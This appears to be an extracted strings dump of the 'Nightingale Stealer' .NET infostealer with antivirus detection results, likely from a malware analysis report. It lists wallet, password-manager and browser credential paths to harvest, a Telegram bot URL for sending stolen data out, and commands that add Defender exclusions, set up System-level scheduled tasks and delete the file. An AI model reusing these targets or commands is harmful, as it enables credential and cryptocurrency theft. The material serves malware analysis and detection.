Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Oxygen
Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
Crocobit
Google\Chrome\User Data\Default\Local Extension Settings\pnlfjmlcjdjgkddecgincndfgegkecke
Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Finnie
Google\Chrome\User Data\Default\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj
Google\Chrome\User Data\Default\Local Extension Settings\cmndjbecilbocjfkibfbifhngkdmjgog
Starcoin
Google\Chrome\User Data\Default\Local Extension Settings\mfhbebgoclkghebffdldpobeajmbecfk
Google\Chrome\User Data\Default\Local Extension Settings\pocmplpaccanhmnllbbkpgfliimjljgo
Phantom
Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Google\Chrome\User Data\Default\Local Extension Settings\gjdpfnfmelhakanjicgoeepdoninjjod
Google\Chrome\User Data\Default\Local Extension Settings\kffganmbldfgkgineogpgclfkkngcool
Gemini
Google\Chrome\User Data\Default\Local Extension Settings\llmlhlddaeediifoladephjpgejknmal
Rainbow
Google\Chrome\User Data\Default\Local Extension Settings\fgmanlmbjbclcnkficdodlognkeheejb
Google\Chrome\User Data\Default\Local Extension Settings\gchanpaeodapopimpablnkmenhkndddi
Google\Chrome\User Data\Default\Local Extension Settings\kcbnmnnkigeelbhlfllahgejbhdnlhan
Monarch
Google\Chrome\User Data\Default\Local Extension Settings
pgnemdcbsnenjgpajdflhjnelnhkdcb
Catalyst
Google\Chrome\User Data\Default\Local Extension Settings
ojhmikaojhghfplekghaghaeogmdhnl
Google\Chrome\User Data\Default\Local Extension Settings\gbanjdaphdabiocllfbjolmdjckocjnj
Crypton
Google\Chrome\User Data\Default\Local Extension Settings\edffijlgmobnajlneenopceappncihfj
Rumble
Google\Chrome\User Data\Default\Local Extension Settings\mlnmjikdhcblohfpfdfmegjkjlnbbkna
Google\Chrome\User Data\Default\Local Extension Settings\fnlgpnbkflbpcpkkohbiojomgeokejjn
Google\Chrome\User Data\Default\Local Extension Settings\okompkjedlhgdlkhbanmiboeploplgpc
OpenSea
Google\Chrome\User Data\Default\Local Extension Settings\aabeakehlapikpddikddcikneklnfbfl
SimpleSwap
Google\Chrome\User Data\Default\Local Extension Settings\lfmgcmgkbkphaaggnofnhoonmjfmjhah
TronLink
Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
UniSwap
Google\Chrome\User Data\Default\Local Extension Settings\ncljmiffkofogcgiepiflbfhjelkklkb
MetaVault
Google\Chrome\User Data\Default\Local Extension Settings\apakagogmckphjnojeblmiaahdnogkni
SafePal
Google\Chrome\User Data\Default\Local Extension Settings\jcjejccajkejpnadafclaophjfpjebhm
Chrome_Sollet
Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Chrome_Metamask
Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Chrome_Ton
Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd
Chrome_XinPay
Google\Chrome\User Data\Default\Local Extension Settings\bocpokimicclpaiekenaeelehdjllofo
Chrome_Mobox
Google\Chrome\User Data\Default\Local Extension Settings\fcckkdbjnoikooededlapcalpionmalo
Chrome_Iconex
Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel
Chrome_Guild
Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Chrome_Equal
Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Chrome_Coin98
Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Chrome_Bitapp
Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Chrome_Binance
Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Chrome_Google_Authicator
Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Chrome_YOROI_WALLET
Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Chrome_NIFTY
Chrome_MATH
Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Chrome_COINBASE
Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Chrome_EQUAL
Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb
Chrome_WOMBAT
Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Chrome_IWALLET
Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Chrome_GUILD1
Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Chrome_SATURN
Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Chrome_RONIN
Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Chrome_NEOLINE
Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Chrome_CLOVER
Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Chrome_LIQUALITY
Edge_Auvitas
Microsoft\Edge\User Data\Default\Local Extension Settings\klfhbdnlcfcaccoakhceodhldjojboga
Edge_Math
Microsoft\Edge\User Data\Default\Local Extension Settings\dfeccadlilpndjjohbjdblepmjeahlmm
Edge_Metamask
Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Edge_MTV
Microsoft\Edge\User Data\Default\Local Extension Settings\oooiblbdpdlecigodndinbpfopomaegl
Edge_Rabet
Microsoft\Edge\User Data\Default\Local Extension Settings\aanjhgiamnacdfnlfnmgehjikagdbafd
Edge_Ronin
Microsoft\Edge\User Data\Default\Local Extension Settings\bblmcdckkhkhfhhpfcchlpalebmonecp
Edge_Yoroi
Microsoft\Edge\User Data\Default\Local Extension Settings\akoiaibnepcedcplijmiamnaigbepmcb
Edge_Zilpay
Microsoft\Edge\User Data\Default\Local Extension Settings\fbekallmnjoeggkefjkbebpineneilec
Edge_Exodus
Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold
\FileZilla\recentservers.xml
\FileZilla\sitemanager.xml
\FileZilla
Profiles
key3.db
key4.db
cookies.sqlite
moz_cookies
formhistory.sqlite
moz_formhistory
Browser Data/Cookies_
Browser Data/AutoFills_
logins.json
encryptedUsername
encryptedPassword
hostname
metaData
password
2A864886F70D010C050103
ISO-8859-1
password-check
2A864886F70D01050D
nssPrivate
global-salt
Version
User Data
1.0.0.0
Local State
Network
Cookies
cookies
Web Data
autofill
Login Data
logins
credit_cards
Local Storage
leveldb
CreditCards.txt
Profile*
Default
Authenticator
bhghoamapcdpbohphigoooaddinpkbai
EOS Authenticator
oeljdldpnmdbchonielidgobddffflal
BrowserPass
naepdomgkenhinolocfifgehidddafch
bmikpgodpkclnkgmnpphehdgcimmided
Splikity
jhfjfclepacoldmjmkmdlmganfaalklb
CommonKey
chgfefjpcobfbnpmiokfjjaglahmnded
Zoho Vault
igkpcodhieompeloncfnbekccinhapdb
Norton Password Manager
admmjipmmciaobhojoghlmleefbicajg
Avira Password Manager
caljgklbbfbcjjanaijlacgncafpegll
Trezor Password Manager
imloifkgjagghnncjkhggdhalmcnfklk
MetaMask
nkbihfbeogaeaoehlefnkodbefgpgknn
ibnejdfjmmkpcnlpebklmnkoeoihofec
BinanceChain
fhbohimaelbohpjbbldcngcnapndodjp
Coin98
aeachknmefphepccionboohckonoeemg
iWallet
kncchdigobghenbbaddojjnnaogfppfj
Wombat
amkmjjmmflddogmhpjloimipbofnfjih
MEW CX
nlbmnnijcnlegkjjpcfjclmcfggfefdm
NeoLine
cphhlgmgameodnhkjdmkpanlelnlohao
Terra Station
aiifbnbfobpmeekipheeijimdpnlpgpp
dmkamcknogkgcdfhhbddcghachkejeap
Sollet
fhmfendgdocmcbmfikdcogofphimnkno
ICONex
flpiciilemghbmfalicajoolhkkenfel
hcflpincpppdclinealmandijcmnkbgn
TezBox
mnfifefkajgofkcjkemidiaecocnkjeh
nlgbhdfgdhgbiamfdfmbikcdghidoadd
OneKey
ilbbpajmiplgpehdikmejfemfklpkmke
Trust Wallet
pknlccmneadmjbkollckpblgaaabameg
MetaWallet
pfknkoocfefiocadajpngdknmkjgakdg
Guarda Wallet
fcglfhcjfpkgdppjbglknafgfffkelnm
idkppnahnmmggbmfkjhiakkbkdpnmnon
Jaxx Liberty
mhonjhhcgphdphdjcdoeodfdliikapmj
Atomic Wallet
bhmlbgebokamljgnceonbncdofmmkedg
hieplnfojfccegoloniefimmbfjdgcgp
Mycelium
pidhddgciaponoajdngciiemcflpnnbg
Coinomi
blbpgcogcoohhngdjafgpoagcilicpjh
GreenAddress
gflpckpfdgcagnbdfafmibcmkadnlhpj
doljkehcfhidippihgakcihcmnknlphh
nbokbjkelpmlgflobbohapifnnenbjlh
Samourai Wallet
apjdnokplgcjkejimjdfjnhmjlbpgkdi
ieedgmmkpkbiblijbbldefkomatsuahh
jifanbgejlbcmhbbdbnfbfnlmbomjedj
Airbitz
KeepKey
dojmlmceifkfgkgeejemfciibjehhdcl
Trezor
jpxupxjxheguvfyhfhahqvxvyqthiryh
Ledger Live
pfkcfdjnlfjcmkjnhcbfhfkkoflnhjln
Ledger Wallet
hbpfjlflhnmkddbjdchbbifhllgmmhnm
Bitbox
ocmfilhakdbncmojmlbagpkjfbmeinbd
Digital Bitbox
dbhklojmlkgmpihhdooibnmidfpeaing
YubiKey
mammpjaaoinfelloncbbpomjcihbkmmc
Google Authenticator
khcodhlfkpmhibicdjjblnkgimdepgnd
Microsoft Authenticator
bfbdnbpibgndpjfhonkflpkijfapmomn
gjffdbjndmcafeoehgdldobgjmlepcal
Duo Mobile
eidlicjlkaiefdbgmdepmmicpbggmhoj
OTP Auth
bobfejfdlhnabgglompioclndjejolch
FreeOTP
elokfmmmjbadpgdjmgglocapdckdcpkn
Aegis Authenticator
ppdjlkfkedmidmclhakfncpfdmdgmjpm
LastPass Authenticator
cfoajccjibkjhbdjnpkbananbejpkkjb
Dashlane
flikjlpgnpcjdienoojmgliechmmheek
Keeper
gofhklgdnbnpcdigdgkgfobhhghjmmkj
RoboForm
hppmchachflomkejbhofobganapojjol
KeePass
lbfeahdfdkibininjgejjgpdafeopflb
KeePassXC
kgeohlebpjgcfiidfhhdlnnkhefajmca
Bitwarden
inljaljiffkdgmlndjkdiepghpolcpki
NordPass
njgnlkhcjgmjfnfahdmfkalpjcneebpl
LastPass
gabedfkgnbglfbnplfpjddgfnbibkmbb
Local Extension Settings
Browser Data/Extensions/
Last Version
Module Info Cache
*cord*
FileGrabber
((((((
((((((((((
((((((((
((((((
Nightingale
{0:dd/MM/yyyy HH:mm:ss}
Developed by Nightingale
Tag: {1}
((((((
((((((
((((((
(((((((
((((((
(((((((
(((((((((
((((((((((
(((((((((((((
(((((((((
----- Geolocation Data -----
{2,-25}{3}
{4,-25}{5} ({6})
{7,-25}{8}
{9,-25}{10}
{11,-25}{12}
{13,-25}{14}
----- Hardware Info -----
{15,-25}{16}\{17}
{18,-25}{19} {20}
{21,-25}{22}
{23,-25}{24}
{25,-25}{26}
{27,-25}{28} / {29} GB
----- Report Contents -----
{30,-25}{31}
{32,-25}{33}
{34,-25}{35}
{36,-25}{37}
{38,-25}{39}
{40,-25}{41}
{42,-25}{43}
{44,-25}{45}
{46,-25}{47}
----- Miscellaneous -----
{48,-25}{49}
{50,-25}{51}
Country:
country
countryCode
Postal:
Static IP:
Username:
Windows name:
Hardware ID:
{0,-25}
Passwords:
Cookies:
Credit Cards:
AutoFills:
Extensions
Wallets:
Files:
Passwords Tags:
Cookies Tags:
Antivirus products:
File Location:
unknown
Information.txt
*Nightingale Stealer Report* \| by Nightingale
``` - IP: {0} \({1}\)
- Tag: {2} {3}
- Passwords: {4}
- Cookies: {5}
- Wallets: {6}```
Unknown
-Nightingale-Report.zip
http://ip-api.com/json/?fields=11827
root\SecurityCenter2
SELECT * FROM AntivirusProduct
displayName
Memory
Available Bytes
SELECT * FROM Win32_VideoController
SELECT * FROM Win32_Processor
SELECT * FROM Win32_ComputerSystem
TotalPhysicalMemory
Win32_Processor
ProcessorId
Win32_DiskDrive
SerialNumber
SELECT * FROM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
user32.dll
gdi32.dll
GetDeviceCaps
Screenshot.png
*ssfn*
\config
Steam/
HKEY_CURRENT_USER\Software\Valve\Steam
SteamPath
root\CIMV2
yyyy-MM-dd h:mm:ss tt
HKEY_CLASSES_ROOT\tg\DefaultIcon
usertag
settings
key_data
prefix
Messengers/TGgoods/
wireshark
httpdebbugerui
VirtualBox
VMware Virtual
VMware
Hyper-V Video
Spread worked.
az-Latn-AZ
tg-Cyrl-TJ
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
System
/k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath
& exit
/k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
NightingalePanel
schtasks.exe
/create /tn {0} /tr "{1}" /sc MINUTE /mo {2} /ru "System" /F
/create /tn
/tr "
" /sc ONLOGON /ru "System" /F
TGgoods
error with subnode, subnode type=
data can not be null!
filename
filedescription
----------------------------
multipart/form-data; boundary=
Content-Disposition: form-data; name="
"; filename="
Content-Type: application/octet-stream
Invalid IP address or port number. Unable to send the data.
Invalid argument format. Unable to send the data.
Connected and listening for messages.
Message received:
payload
Executing:
An exception occurred while listening for messages:
https://api.telegram.org/bot{0}/sendDocument
document
chat_id
parse_mode
MarkdownV2
caption
SEQUENCE {
{0:X2}
INTEGER
OCTETSTRING
OBJECTIDENTIFIER
00061561
bcrypt.dll
BCryptDecrypt
BCryptDestroyKey
BCryptCloseAlgorithmProvider
Microsoft Primitive Provider
ChainingModeGCM
BCryptOpenAlgorithmProvider
BCryptSetProperty
ChainingMode
AuthTagLength
BCryptImportKey
ObjectLength
KeyDataBlob
BCryptGetProperty
crypt32.dll
CryptUnprotectData
algorithm
Algorithm cannot be null.
Password cannot be null.
Salt cannot be null.
Derived key too long.
Plugin.Main
NightingaleStub
\root\SecurityCenter2
SELECT * FROM Win32_OperatingSystem
Caption
OSArchitecture
UNKNOWN
/C choice /C Y /N /D Y /T 3 & Del "
cmd.exe
/query /v /fo csv
TaskName
Task To Run
/delete /tn "
Name:
Value:
Hostname:
Username:
Password:
Browser:
Number: {0}
Placeholder: {1}
Expiration: {2}/{3}
Browser: {4} v{5} ({6})
encrypted_key
roblox.com
steampowered.com
genshin
epicgames.com
fortnite.com
tinkoff
yoomoney
sberbank
facebook
FACEBOOK
funpay
paypal
americanexpress
amazon
spotify
music.apple
deadcode
nursultan
akrien
expenisve
wexside
x.synapse
synapse
neverlose
gamesense
nixware
primordial
interium
CHEATS
dQw4w9WgXcQ:[^"]*
dQw4w9WgXcQ:
SELECT * FROM Win32_Process WHERE ProcessId = {0}
ParentProcessId
UNIQUE
Writing is not allowed
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
system.exe
LegalCopyright
Copyright
2023
LegalTrademarks
OriginalFilename
system.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
"Microsoft Window
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.Coins.i!c
tehtris Clean
ClamAV Win.Packed.Msilzilla-10026835-0
CMC Clean
CAT-QuickHeal Trojan.YakbeexMSIL.ZZ4
Skyhigh Artemis!Trojan
ALYac IL:Trojan.MSILZilla.29594
Cylance Unsafe
Zillya Clean
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Spyware ( 005a84151 )
Alibaba TrojanPSW:MSIL/Coins.dac4c6be
K7GW Spyware ( 005a84151 )
Cybereason malicious.5dbb52
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.A
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
Elastic Windows.Infostealer.PhemedroneStealer
ESET-NOD32 a variant of MSIL/Spy.Agent.ENP
APEX Malicious
Avast Win32:SpywareX-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan-PSW.MSIL.Coins.gen
BitDefender IL:Trojan.MSILZilla.29594
NANO-Antivirus Clean
ViRobot Trojan.Win.Z.Agent.199272
MicroWorld-eScan IL:Trojan.MSILZilla.29594
Tencent Malware.Win32.Gencirc.140ee3ff
TACHYON Clean
Sophos Mal/Generic-S
F-Secure Trojan.TR/Spy.Agent.qeoyw
DrWeb BackDoor.XenoRatNET.15
VIPRE IL:Trojan.MSILZilla.29594
TrendMicro TROJ_GEN.R002C0XFG24
McAfeeD ti!201453AFC1CC
Trapmine Clean
FireEye Generic.mg.571878c5dbb52005
Emsisoft IL:Trojan.MSILZilla.29594 (B)
SentinelOne Static AI - Malicious PE
GData IL:Trojan.MSILZilla.29594
Jiangmin Trojan.PSW.MSIL.etot
Webroot Clean
Varist W32/MSIL_Kryptik.LAN.gen!Eldorado
Avira TR/Spy.Agent.qeoyw
Antiy-AVL Trojan[PSW]/MSIL.Coins
Kingsoft malware.kb.c.988
Gridinsoft Ransom.Win32.Wacatac.sa
Xcitium Clean
Arcabit IL:Trojan.MSILZilla.D739A
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-PSW.MSIL.Coins.gen
Microsoft Trojan:MSIL/FormBook.CD!MTB
Google Detected
AhnLab-V3 Trojan/Win.FRAX.C5616093
Acronis Clean
McAfee Artemis!571878C5DBB5
MAX malware (ai score=88)
VBA32 Trojan.MSIL.InfoStealer.gen.D
Malwarebytes Spyware.Agent.MSIL
Panda Trj/Chgt.AD
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002C0XFG24
Rising Stealer.Phemedrone!1.F3D5 (CLASSIC)
Yandex Clean
Ikarus Win32.Outbreak
MaxSecure Win.MxResIcn.Heur.Gen
Fortinet MSIL/Agent.ENP!tr.spy
BitDefenderTheta Gen:NN.ZemsilF.36806.mm3@amMJXLg
AVG Win32:SpywareX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Trojan[stealer]:MSIL/Coins.gyf
No IRMA results available.